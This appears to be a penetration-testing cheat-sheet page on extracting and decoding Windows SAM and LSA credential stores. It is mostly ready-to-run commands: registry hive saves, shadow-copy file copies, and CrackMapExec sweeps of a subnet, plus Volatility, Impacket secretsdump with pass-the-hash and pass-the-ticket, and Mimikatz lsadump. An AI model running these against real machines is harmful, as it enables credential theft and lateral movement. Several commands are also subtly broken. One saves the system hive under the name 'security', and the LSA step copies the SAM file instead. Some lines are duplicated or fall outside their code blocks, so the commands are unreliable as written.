# Local credentials (SAM and LSA)
## Overview
SAM (Security Accounts Manager) and LSA (Local Security Authority) are two important databases used in the security architecture of Windows operating systems.
The SAM database is a part of the Windows registry and stores information related to local user accounts and security policies. It contains data such as usernames, passwords (hashed), account status, and group membership. Windows uses SAM to perform local user authentication and enforce security policies on a per-machine basis.
The LSA database, on the other hand, is a component of the Windows security subsystem that provides security-related services to applications and other system components. It stores security-related information such as authentication credentials, security policy settings, and account lockout policies. The LSA database is responsible for enforcing security policies, authenticating users, and managing security tokens for applications and system services.
In summary, while the SAM database is primarily concerned with managing local user accounts and security policies, the LSA database provides a broader range of security-related services and is used by various components of the Windows operating system.
| Hive | Details |
| -------- | -------------------------------------------------------------------- |
| SAM | Contains local cached credentials. |
| Security | Stores clear text credentials, password hashes, security tokens etc. |
| System | Store enough info to decrypt the SAM and LSA hives. |
## Obtaining the SAM and LSA database
{% tabs %}
{% tab title="Registry" %}
{% hint style="warning" %}
To be able to decrypt the SAM database, we'll require the sam and system hive where the encryption key is stored.
To be able to decrypt the LSA database, we'll require the security and system hive where the encryption key is stored.
{% endhint %}
```powershell
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\system security
```
{% endtab %}
{% tab title="Volume Shadow Copy" %}
Creating a shadow copy.
```powershell
wmic shadowcopy call create Volume='C:\'
```
List existing shadow copies.
```powershell
vssadmin list shadows
```
Copying the SAM database.
{% code overflow="wrap" %}
```powershell
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\sam
```
{% endcode %}
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
Copying the LSA databases.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\security
{% code overflow="wrap" %}
```powershell
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
```
{% endcode %}
{% endtab %}
{% tab title="CrackMapExec" %}
Obtaining SAM
```
crackmapexec smb 192.168.1.0/24 -u {username} -p {password} --sam
```
Obtaining LSA
```
crackmapexec smb 192.168.1.0/24 -u {username} -p {password} --lsa
```
{% endtab %}
{% tab title="Full memory dump and Volatility" %}
### Full memory dump and Volatility
{% embed url="" %}
Obtain memory dump from Magnet Ram Capture or other forensics tools.
#### Using volatility to read memory and obtain credentials
{% embed url="" %}
{% embed url="" %}
```
py .\vol.py -f C:\Users\admin\ram_memdump.raw windows.hashdump.HashDump
```
{% endtab %}
{% endtabs %}
## Decoding the SAM and LSA database
{% tabs %}
{% tab title="secretsdump" %}
Impacket's secretsdump is a Python tool used for extracting authentication credentials from Windows systems. It can extract password hashes from the Security Account Manager (SAM) database and Kerberos tickets from the Local Security Authority (LSA) database.
{% code overflow="wrap" %}
```bash
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'
# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
```
{% endcode %}
{% endtab %}
{% tab title="Mimikatz" %}
Mimikatz is a powerful Windows post-exploitation tool that can extract sensitive information such as password hashes, plaintext passwords, and Kerberos tickets from memory on a compromised system.
{% code overflow="wrap" %}
```bash
# Local dumping of SAM secrets on the target
lsadump::sam
# Offline dumping of SAM secrets from exported hives
lsadump::sam /sam:'C:\path\to\sam.save' /system:'C:\path\to\system.save'
# Local dumping of LSA secrets on the target
lsadump::secrets
# Offline dumping LSA secrets from exported hives
lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system.save'
```
{% endcode %}
{% endtab %}
{% tab title="CrackMapExec" %}
CrackMapExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)
{% code overflow="wrap" %}
```bash
# Remote dumping of SAM/LSA secrets
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (local user authentication)
crackmapexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-hash)
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-ticket)
crackmapexec smb $TARGETS --kerberos --sam/--lsa
```
{% endcode %}
{% endtab %}
{% endtabs %}
## References
{% embed url="" %}